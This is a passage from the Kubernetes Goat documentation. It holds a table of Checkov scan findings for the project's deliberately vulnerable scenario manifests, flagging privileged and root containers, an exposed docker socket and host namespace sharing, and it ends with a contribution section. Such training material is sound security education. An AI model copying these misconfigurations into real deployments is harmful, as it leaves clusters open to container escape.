78 | CKV_K8S_23 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default | Minimize the admission of root containers |
79 | CKV_K8S_37 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Minimize the admission of containers with capabilities assigned |
80 | CKV_K8S_12 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Memory requests should be set |
81 | CKV_K8S_20 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Containers should not run with allowPrivilegeEscalation |
82 | CKV_K8S_13 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Memory limits should be set |
83 | CKV_K8S_10 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | CPU requests should be set |
84 | CKV_K8S_22 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Use read-only filesystem for containers where possible |
85 | CKV_K8S_28 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
86 | CKV_K8S_30 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Apply security context to your pods and containers |
87 | CKV_K8S_14 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Image Tag should be fixed - not latest or blank |
88 | CKV_K8S_43 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | Image should use digest |
89 | CKV_K8S_11 | /scenarios/batch-check/job.yaml | Job.batch-check-job.default (container 0) | CPU limits should be set |
90 | CKV_K8S_31 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
91 | CKV_K8S_40 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default | Containers should run as a high UID to avoid host conflict |
92 | CKV_K8S_29 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default | Apply security context to your pods and containers |
93 | CKV_K8S_38 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
94 | CKV_K8S_21 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default | The default namespace should not be used |
95 | CKV_K8S_23 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default | Minimize the admission of root containers |
96 | CKV_K8S_21 | /scenarios/hunger-check/deployment.yaml | Service.hunger-check-service.default | The default namespace should not be used |
97 | CKV_K8S_37 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
98 | CKV_K8S_8 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Liveness Probe Should be Configured |
99 | CKV_K8S_12 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Memory requests should be set |
100 | CKV_K8S_20 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
101 | CKV_K8S_13 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Memory limits should be set |
102 | CKV_K8S_10 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | CPU requests should be set |
103 | CKV_K8S_22 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Use read-only filesystem for containers where possible |
104 | CKV_K8S_9 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Readiness Probe Should be Configured |
105 | CKV_K8S_28 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
106 | CKV_K8S_30 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Apply security context to your pods and containers |
107 | CKV_K8S_14 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
108 | CKV_K8S_43 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | Image should use digest |
109 | CKV_K8S_11 | /scenarios/hunger-check/deployment.yaml | Deployment.hunger-check-deployment.default (container 0) | CPU limits should be set |
110 | CKV_K8S_31 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
111 | CKV_K8S_40 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default | Containers should run as a high UID to avoid host conflict |
112 | CKV_K8S_29 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default | Apply security context to your pods and containers |
113 | CKV_K8S_38 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
114 | CKV_K8S_21 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default | The default namespace should not be used |
115 | CKV_K8S_23 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default | Minimize the admission of root containers |
116 | CKV_K8S_21 | /scenarios/poor-registry/deployment.yaml | Service.poor-registry-service.default | The default namespace should not be used |
117 | CKV_K8S_37 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
118 | CKV_K8S_8 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Liveness Probe Should be Configured |
119 | CKV_K8S_12 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Memory requests should be set |
120 | CKV_K8S_20 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
121 | CKV_K8S_10 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | CPU requests should be set |
122 | CKV_K8S_22 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Use read-only filesystem for containers where possible |
123 | CKV_K8S_9 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Readiness Probe Should be Configured |
124 | CKV_K8S_28 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
125 | CKV_K8S_30 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Apply security context to your pods and containers |
126 | CKV_K8S_14 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
127 | CKV_K8S_43 | /scenarios/poor-registry/deployment.yaml | Deployment.poor-registry-deployment.default (container 0) | Image should use digest |
128 | CKV_K8S_31 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
129 | CKV_K8S_40 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | Containers should run as a high UID to avoid host conflict |
130 | CKV_K8S_17 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | Containers should not share the host process ID namespace |
131 | CKV_K8S_29 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | Apply security context to your pods and containers |
132 | CKV_K8S_38 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | Ensure that Service Account Tokens are only mounted where necessary |
133 | CKV_K8S_21 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | The default namespace should not be used |
134 | CKV_K8S_23 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default | Minimize the admission of root containers |
135 | CKV_K8S_37 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Minimize the admission of containers with capabilities assigned |
136 | CKV_K8S_12 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Memory requests should be set |
137 | CKV_K8S_20 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Containers should not run with allowPrivilegeEscalation |
138 | CKV_K8S_13 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Memory limits should be set |
139 | CKV_K8S_10 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | CPU requests should be set |
140 | CKV_K8S_22 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Use read-only filesystem for containers where possible |
141 | CKV_K8S_28 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
142 | CKV_K8S_30 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Apply security context to your pods and containers |
143 | CKV_K8S_14 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Image Tag should be fixed - not latest or blank |
144 | CKV_K8S_43 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | Image should use digest |
145 | CKV_K8S_11 | /scenarios/kube-bench-security/master-job.yaml | Job.kube-bench-master.default (container 0) | CPU limits should be set |
146 | CKV_K8S_31 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
147 | CKV_K8S_40 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | Containers should run as a high UID to avoid host conflict |
148 | CKV_K8S_17 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | Containers should not share the host process ID namespace |
149 | CKV_K8S_29 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | Apply security context to your pods and containers |
150 | CKV_K8S_38 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | Ensure that Service Account Tokens are only mounted where necessary |
151 | CKV_K8S_21 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | The default namespace should not be used |
152 | CKV_K8S_23 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default | Minimize the admission of root containers |
153 | CKV_K8S_37 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Minimize the admission of containers with capabilities assigned |
154 | CKV_K8S_12 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Memory requests should be set |
155 | CKV_K8S_20 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Containers should not run with allowPrivilegeEscalation |
156 | CKV_K8S_13 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Memory limits should be set |
157 | CKV_K8S_10 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | CPU requests should be set |
158 | CKV_K8S_22 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Use read-only filesystem for containers where possible |
159 | CKV_K8S_28 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
160 | CKV_K8S_30 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Apply security context to your pods and containers |
161 | CKV_K8S_14 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Image Tag should be fixed - not latest or blank |
162 | CKV_K8S_43 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | Image should use digest |
163 | CKV_K8S_11 | /scenarios/kube-bench-security/node-job.yaml | Job.kube-bench-node.default (container 0) | CPU limits should be set |
164 | CKV_K8S_31 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
165 | CKV_K8S_27 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | Do not expose the docker daemon socket to containers |
166 | CKV_K8S_40 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | Containers should run as a high UID to avoid host conflict |
167 | CKV_K8S_29 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | Apply security context to your pods and containers |
168 | CKV_K8S_38 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
169 | CKV_K8S_21 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | The default namespace should not be used |
170 | CKV_K8S_23 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default | Minimize the admission of root containers |
171 | CKV_K8S_21 | /scenarios/health-check/deployment.yaml | Service.health-check-service.default | The default namespace should not be used |
172 | CKV_K8S_37 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
173 | CKV_K8S_8 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Liveness Probe Should be Configured |
174 | CKV_K8S_12 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Memory requests should be set |
175 | CKV_K8S_20 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
176 | CKV_K8S_10 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | CPU requests should be set |
177 | CKV_K8S_16 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Container should not be privileged |
178 | CKV_K8S_22 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Use read-only filesystem for containers where possible |
179 | CKV_K8S_9 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Readiness Probe Should be Configured |
180 | CKV_K8S_28 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
181 | CKV_K8S_14 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
182 | CKV_K8S_43 | /scenarios/health-check/deployment.yaml | Deployment.health-check-deployment.default (container 0) | Image should use digest |
183 | CKV_K8S_31 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
184 | CKV_K8S_40 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default | Containers should run as a high UID to avoid host conflict |
185 | CKV_K8S_29 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default | Apply security context to your pods and containers |
186 | CKV_K8S_38 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
187 | CKV_K8S_21 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default | The default namespace should not be used |
188 | CKV_K8S_23 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default | Minimize the admission of root containers |
189 | CKV_K8S_21 | /scenarios/internal-proxy/deployment.yaml | Service.internal-proxy-api-service.default | The default namespace should not be used |
190 | CKV_K8S_21 | /scenarios/internal-proxy/deployment.yaml | Service.internal-proxy-info-app-service.default | The default namespace should not be used |
191 | CKV_K8S_37 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
192 | CKV_K8S_8 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Liveness Probe Should be Configured |
193 | CKV_K8S_20 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
194 | CKV_K8S_22 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Use read-only filesystem for containers where possible |
195 | CKV_K8S_9 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Readiness Probe Should be Configured |
196 | CKV_K8S_28 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
197 | CKV_K8S_30 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Apply security context to your pods and containers |
198 | CKV_K8S_14 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
199 | CKV_K8S_43 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 0) | Image should use digest |
200 | CKV_K8S_37 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Minimize the admission of containers with capabilities assigned |
201 | CKV_K8S_8 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Liveness Probe Should be Configured |
202 | CKV_K8S_20 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Containers should not run with allowPrivilegeEscalation |
203 | CKV_K8S_22 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Use read-only filesystem for containers where possible |
204 | CKV_K8S_9 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Readiness Probe Should be Configured |
205 | CKV_K8S_28 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Minimize the admission of containers with the NET_RAW capability |
206 | CKV_K8S_30 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Apply security context to your pods and containers |
207 | CKV_K8S_14 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Image Tag should be fixed - not latest or blank |
208 | CKV_K8S_43 | /scenarios/internal-proxy/deployment.yaml | Deployment.internal-proxy-deployment.default (container 1) | Image should use digest |
209 | CKV_K8S_21 | /scenarios/system-monitor/deployment.yaml | Secret.goatvault.default | The default namespace should not be used |
210 | CKV_K8S_31 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Ensure that the seccomp profile is set to docker/default or runtime/default |
211 | CKV_K8S_40 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Containers should run as a high UID to avoid host conflict |
212 | CKV_K8S_19 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Containers should not share the host network namespace |
213 | CKV_K8S_17 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Containers should not share the host process ID namespace |
214 | CKV_K8S_18 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Containers should not share the host IPC namespace |
215 | CKV_K8S_29 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Apply security context to your pods and containers |
216 | CKV_K8S_38 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Ensure that Service Account Tokens are only mounted where necessary |
217 | CKV_K8S_21 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | The default namespace should not be used |
218 | CKV_K8S_23 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default | Minimize the admission of root containers |
219 | CKV_K8S_21 | /scenarios/system-monitor/deployment.yaml | Service.system-monitor-service.default | The default namespace should not be used |
220 | CKV_K8S_37 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Minimize the admission of containers with capabilities assigned |
221 | CKV_K8S_8 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Liveness Probe Should be Configured |
222 | CKV_K8S_12 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Memory requests should be set |
223 | CKV_K8S_20 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Containers should not run with allowPrivilegeEscalation |
224 | CKV_K8S_10 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | CPU requests should be set |
225 | CKV_K8S_16 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Container should not be privileged |
226 | CKV_K8S_22 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Use read-only filesystem for containers where possible |
227 | CKV_K8S_9 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Readiness Probe Should be Configured |
228 | CKV_K8S_35 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Prefer using secrets as files over secrets as environment variables |
229 | CKV_K8S_28 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Minimize the admission of containers with the NET_RAW capability |
230 | CKV_K8S_14 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Image Tag should be fixed - not latest or blank |
231 | CKV_K8S_43 | /scenarios/system-monitor/deployment.yaml | Deployment.system-monitor-deployment.default (container 0) | Image should use digest |
Getting Involved
First of all, thank you so much for showing interest in Kubernetes Goat, we really appreciate it.
Here are some of the ways you can contribute to the Kubernetes-Goat
-
By providing your valuable feedback. Your honest feedback is always appreciated, no matter if it is positive or negative :)
-
By contributing to the development of platform and scenarios
-
Improving the documentation/notes
-
By spreading the word and sharing with community, friends, and colleagues